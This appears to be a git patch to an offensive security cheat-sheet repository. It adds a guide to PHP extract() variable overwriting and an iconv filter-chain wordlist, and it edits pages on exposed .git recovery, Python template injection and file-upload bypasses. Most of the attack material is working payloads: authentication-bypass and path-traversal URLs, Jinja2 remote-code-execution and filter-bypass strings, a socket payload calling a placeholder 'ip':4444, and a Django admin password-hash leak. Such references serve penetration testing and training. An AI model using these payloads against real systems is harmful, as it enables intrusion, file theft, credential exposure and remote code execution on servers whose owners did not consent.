From 64b36854a7683393292bfcfea08dd480b73c8f66 Mon Sep 17 00:00:00 2001 From: hacker <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 7 Mar 2025 12:15:00 +0100 Subject: [PATCH] External Variable Modification --- External Variable Modification/README.md | 98 +++++++++++++++++++ File Inclusion/Intruders/php-filter-iconv.txt | 50 ++++++++++ Insecure Source Code Management/Git.md | 80 +++++++++------ Server Side Template Injection/Python.md | 34 +++---- Upload Insecure Files/README.md | 23 ++++- 5 files changed, 228 insertions(+), 57 deletions(-) create mode 100644 External Variable Modification/README.md create mode 100644 File Inclusion/Intruders/php-filter-iconv.txt diff --git a/External Variable Modification/README.md b/External Variable Modification/README.md new file mode 100644 index 0000000000..e3da1f088e --- /dev/null +++ b/External Variable Modification/README.md @@ -0,0 +1,98 @@ +# External Variable Modification + +> External Variable Modification Vulnerability occurs when a web application improperly handles user input, allowing attackers to overwrite internal variables. In PHP, functions like extract($_GET), extract($_POST), or import_request_variables() can be abused if they import user-controlled data into the global scope without proper validation. This can lead to security issues such as unauthorized changes to application logic, privilege escalation, or bypassing security controls. + +## Summary + +* [Methodology](#methodology) + * [Overwriting Critical Variables](#overwriting-critical-variables) + * [Poisoning File Inclusion](#poisoning-file-inclusion) + * [Global Variable Injection](#global-variable-injection) +* [Remediations](#remediations) +* [References](#references) + +## Methodology + +The `extract()` function in PHP imports variables from an array into the current symbol table. While it may seem convenient, it can introduce serious security risks, especially when handling user-supplied data. + +* It allows overwriting existing variables. +* It can lead to **variable pollution**, impacting security mechanisms. +* It can be used as a **gadget** to trigger other vulnerabilities like Remote Code Execution (RCE) and Local File Inclusion (LFI). + +By default, `extract()` uses `EXTR_OVERWRITE`, meaning it **replaces existing variables** if they share the same name as keys in the input array. + +### Overwriting Critical Variables + +If `extract()` is used in a script that relies on specific variables, an attacker can manipulate them. + +```php + +``` + +**Exploitation:** + +In this example, the use of `extract($_GET)` allow an attacker to set the `$authenticated` variable to `true`: + +```ps1 +http://example.com/vuln.php?authenticated=true +http://example.com/vuln.php?authenticated=1 +``` + +### Poisoning File Inclusion + +If `extract()` is combined with file inclusion, attackers can control file paths. + +```php + +``` + +**Exploitation:** + +```ps1 +http://example.com/vuln.php?page=../../etc/passwd +``` + +### Global Variable Injection + +:warning: As of PHP 8.1.0, write access to the entire `$GLOBALS` array is no longer supported. + +Overwriting `$GLOBALS` when an application calls `extract` function on untrusted value: + +```php +extract($_GET); +``` + +An attacker can manipulate **global variables**: + +```ps1 +http://example.com/vuln.php?GLOBALS[admin]=1 +``` + +## Remediations + +Use `EXTR_SKIP` to prevent overwriting: + +```php +extract($_GET, EXTR_SKIP); +``` + +## References + +* [CWE-473: PHP External Variable Modification - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/473.html) +* [CWE-621: Variable Extraction Error - Common Weakness Enumeration - November 19, 2024](https://cwe.mitre.org/data/definitions/621.html) +* [Function extract - PHP Documentation - March 21, 2001](https://www.php.net/manual/en/function.extract.php) +* [$GLOBALS variables - PHP Documentation - April 30, 2008](https://www.php.net/manual/en/reserved.variables.globals.php) +* [The Ducks - HackThisSite - December 14, 2016](https://github.com/HackThisSite/CTF-Writeups/blob/master/2016/SCTF/Ducks/README.md) +* [Extracttheflag! - Orel / WindTeam - February 28, 2024](https://ctftime.org/writeup/38076) diff --git a/File Inclusion/Intruders/php-filter-iconv.txt b/File Inclusion/Intruders/php-filter-iconv.txt new file mode 100644 index 0000000000..640f079797 --- /dev/null +++ b/File Inclusion/Intruders/php-filter-iconv.txt @@ -0,0 +1,50 @@ +convert.iconv.437.CP930 +convert.iconv.CP1390.CSIBM932 +convert.iconv.CP273.CP1122 +convert.iconv.CP285.CP280 +convert.iconv.CSISO5427CYRILLIC.855 +convert.iconv.CSN_369103.CP770 +convert.iconv.CSUNICODE.CSUNICODE +convert.iconv.CSUNICODE.UCS-2BE +convert.iconv.ES.IBM037 +convert.iconv.ES.IBM930 +convert.iconv.IBM037.CP1250 +convert.iconv.IBM037.IBM256 +convert.iconv.IBM037.IBM280 +convert.iconv.IBM037.IBM860 +convert.iconv.IBM1122.IBM273 +convert.iconv.IBM1137.8859_1 +convert.iconv.IBM1141.8859_1 +convert.iconv.IBM1141.IBM4517 +convert.iconv.IBM1145.IBM850 +convert.iconv.IBM1148.EBCDIC-AT-DE-A +convert.iconv.IBM1149.MAC-SAMI +convert.iconv.IBM1390.IBM932 +convert.iconv.IBM1390.IBM939 +convert.iconv.IBM1399.IBM930 +convert.iconv.IBM256.IBM273 +convert.iconv.IBM273.CWI +convert.iconv.IBM273.ES +convert.iconv.IBM273.IBM420 +convert.iconv.IBM273.IT +convert.iconv.IBM273.PT +convert.iconv.IBM273.US +convert.iconv.IBM277.ISO-8859-9E +convert.iconv.IBM278.IBM861 +convert.iconv.IBM278.MIK +convert.iconv.IBM284.IBM278 +convert.iconv.IBM297.IBM273 +convert.iconv.IBM297.IBM280 +convert.iconv.IBM4971.ARMSCII-8 +convert.iconv.IBM870.MAC-IS +convert.iconv.L1.UCS-4 +convert.iconv.L1.UCS-4LE +convert.iconv.L1.UTF16LE +convert.iconv.L1.utf7 +convert.iconv.L1.UTF7 +convert.iconv.UCS-4LE.10646-1:1993 +convert.iconv.UTF16.UTF16 +convert.iconv..UTF7 +convert.iconv.UTF8.CP930 +convert.iconv.UTF8.IBM1140 +convert.iconv.VISCII.MSZ_7795.3 \ No newline at end of file diff --git a/Insecure Source Code Management/Git.md b/Insecure Source Code Management/Git.md index 17b47ebad0..180cc61b10 100644 --- a/Insecure Source Code Management/Git.md +++ b/Insecure Source Code Management/Git.md @@ -14,12 +14,12 @@ * [GitHack](#githack) * [GitTools](#gittools) * [Harvesting secrets](#harvesting-secrets) + * [noseyparker](#noseyparker) * [trufflehog](#trufflehog) * [Yar](#yar) * [Gitrob](#gitrob) * [Gitleaks](#gitleaks) -* [Refererences] - +* [References](#references) ## Methodology @@ -27,22 +27,24 @@ The following examples will create either a copy of the .git or a copy of the cu Check for the following files, if they exist you can extract the .git folder. -- `.git/config` -- `.git/HEAD` -- `.git/logs/HEAD` - +* `.git/config` +* `.git/HEAD` +* `.git/logs/HEAD` ### Recovering file contents from .git/logs/HEAD -1. Check for 403 Forbidden or directory listing to find the `/.git/` directory -2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) +* Check for 403 Forbidden or directory listing to find the `/.git/` directory +* Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) + ```powershell 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. ``` -3. Access the commit using the hash + +* Access the commit using the hash + ```powershell # create an empty .git repository git init test @@ -63,20 +65,24 @@ Check for the following files, if they exist you can extract the .git folder. committer Michael 1489390329 +0000 Initial. ``` -4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - ```powershell - wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 - mkdir .git/object/32 - mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ - - git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 - 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css - 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt - 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts - 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html - 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js - ``` -5. Read the data (flag.txt) + +* Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 + + ```powershell + wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 + mkdir .git/object/32 + mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ + + git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 + 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css + 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt + 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts + 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html + 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js + ``` + +* Read the data (flag.txt) + ```powershell wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f mkdir .git/object/cb @@ -84,10 +90,9 @@ Check for the following files, if they exist you can extract the .git folder. git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f ``` - ### Recovering file contents from .git/index -Use the git index file parser https://pypi.python.org/pypi/gin (python3). +Use the git index file parser (python3). ```powershell pip3 install gin @@ -105,7 +110,6 @@ name = CRLF injection/README.md sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 ``` - ## Tools ### Automatic recovery @@ -113,6 +117,7 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 #### git-dumper.py * [arthaud/git-dumper](https://github.com/arthaud/git-dumper) + ```powershell pip install -r requirements.txt ./git-dumper.py http://web.site/.git ~/website @@ -175,16 +180,27 @@ GitHack.py http://web.site/.git/ git checkout -- . ``` - ### Harvesting secrets +#### noseyparker + +> [praetorian-inc/noseyparker](https://github.com/praetorian-inc/noseyparker) - Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data and Git history. + +```ps1 +git clone https://github.com/trufflesecurity/test_keys +docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest scan --datastore datastore.np ./test_keys/ +docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest report --color always +noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker +noseyparker scan --datastore np.noseyparker --github-user octocat +``` + #### trufflehog > Searches through git repositories for high entropy strings and secrets, digging deep into commit history. ```powershell -pip install truffleHog # https://github.com/dxa4481/truffleHog -truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git +pip install truffleHog +truffleHog --regex --entropy=False https://github.com/trufflesecurity/trufflehog.git ``` #### Yar @@ -211,21 +227,23 @@ gitrob [options] target [target2] ... [targetN] > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. * Run gitleaks against a public repository + ```powershell docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git ``` * Run gitleaks against a local repository already cloned into /tmp/ + ```powershell docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks ``` * Run gitleaks against a specific Github Pull request + ```powershell docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 ``` - ## References -- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/) +* [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index e3b57f82ff..e4234cbfa3 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -2,7 +2,6 @@ > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious input into a server-side template, causing arbitrary code execution on the server. In Python, SSTI can occur when using templating engines such as Jinja2, Mako, or Django templates, where user input is included in templates without proper sanitization. - ## Summary - [Templating Libraries](#templating-libraries) @@ -30,12 +29,11 @@ - [Jinja2 - Filter Bypass](#jinja2---filter-bypass) - [Tornado](#tornado) - [Tornado - Basic Injection](#tornado---basic-injection) - - [Tornado - Remote Command Execution](#tornado---remote-command-execution) + - [Tornado - Remote Command Execution](#tornado---remote-command-execution) - [Mako](#mako) - [Mako - Remote Command Execution](#mako---remote-command-execution) - [References](#references) - ## Templating Libraries | Template Name | Payload Format | @@ -49,7 +47,6 @@ | Pystache | `{{ }}` | | Tornado | `{{ }}` | - ## Django Django template language supports 2 rendering engines by default: Django Templates (DT) and Jinja2. Django Templates is much simpler engine. It does not allow calling of passed object functions and impact of SSTI in DT is often less severe than in Jinja2. @@ -62,7 +59,6 @@ Django template language supports 2 rendering engines by default: Django Templat ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r ``` - ### Django - Cross-Site Scripting ```python @@ -84,17 +80,17 @@ ih0vr{{364|add:733}}d121r # Burp Payload -> ih0vr1097d121r ### Django - Admin Site URL leak - -``` +```python {% include 'admin/base.html' %} ``` ### Django - Admin Username And Password Hash Leak - -``` +```ps1 {% load log %}{% get_admin_log 10 as log %}{% for e in log %} {{e.user.get_username}} : {{e.user.password}}{% endfor %} + +{% get_admin_log 10 as admin_log for_user user %} ``` --- @@ -137,7 +133,7 @@ If the Debug Extension is enabled, a `{% debug %}` tag will be available to dump 
{% debug %}
``` -Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement +Source: ### Jinja2 - Dump All Used Classes @@ -202,7 +198,6 @@ def hook(*args, **kwargs): }} ``` - #### Exploit The SSTI By Calling os.popen().read() ```python @@ -225,7 +220,7 @@ We can use these shorter payloads: {{ namespace.__init__.__globals__.os.popen('id').read() }} ``` -Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/ +Source [@podalirius_](https://twitter.com/podalirius_) : With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template: @@ -233,7 +228,7 @@ With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a pa {{ lipsum.__globals__["os"].popen('id').read() }} ``` -Source: https://twitter.com/podalirius_/status/1655970628648697860 +Source: #### Exploit The SSTI By Calling subprocess.Popen @@ -250,7 +245,7 @@ Source: https://twitter.com/podalirius_/status/1655970628648697860 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} ``` -Simply modification of payload to clean up output and facilitate command input (https://twitter.com/SecGus/status/1198976764351066113) +Simply modification of payload to clean up output and facilitate command input () In another GET parameter include a variable named "input" that contains the command you want to run (For example: &input=ls) ```python @@ -303,14 +298,14 @@ Bypassing `|join` http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_ ``` -Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus: +Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by : + ```python {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} ``` --- - ## Tornado ### Tornado - Basic Injection @@ -329,15 +324,11 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http --- - ## Mako [Official website](https://www.makotemplates.org/) > Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. - - - ```python <% import os @@ -414,10 +405,9 @@ PoC : ``` - ## References - [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) - [Exploring SSTI in Flask/Jinja2, Part II - Tim Tomes - March 11, 2016](https://web.archive.org/web/20170710015954/https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) -- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) \ No newline at end of file +- [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 4545177284..7dc8e608cb 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -95,10 +95,25 @@ Here is a list of the default extensions for web shell pages in the selected lan MIME type, a MIME type (Multipurpose Internet Mail Extensions type) is a standardized identifier that tells browsers, servers, and applications what kind of file or data is being handled. It consists of a type and a subtype, separated by a slash. Change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` to disguise the content as an image. -* `Content-Type : image/gif` -* `Content-Type : image/png` -* `Content-Type : image/jpeg` -* Content-Type wordlist: [SecLists/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt) +* Common images content-types: + + ```cs + Content-Type: image/gif + Content-Type: image/png + Content-Type: image/jpeg + ``` + +* Content-Type wordlist: [SecLists/web-all-content-types.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt) + + ```cs + text/php + text/x-php + application/php + application/x-php + application/x-httpd-php + application/x-httpd-php-source + ``` + * Set the `Content-Type` twice, once for unallowed type and once for allowed. [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) - Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.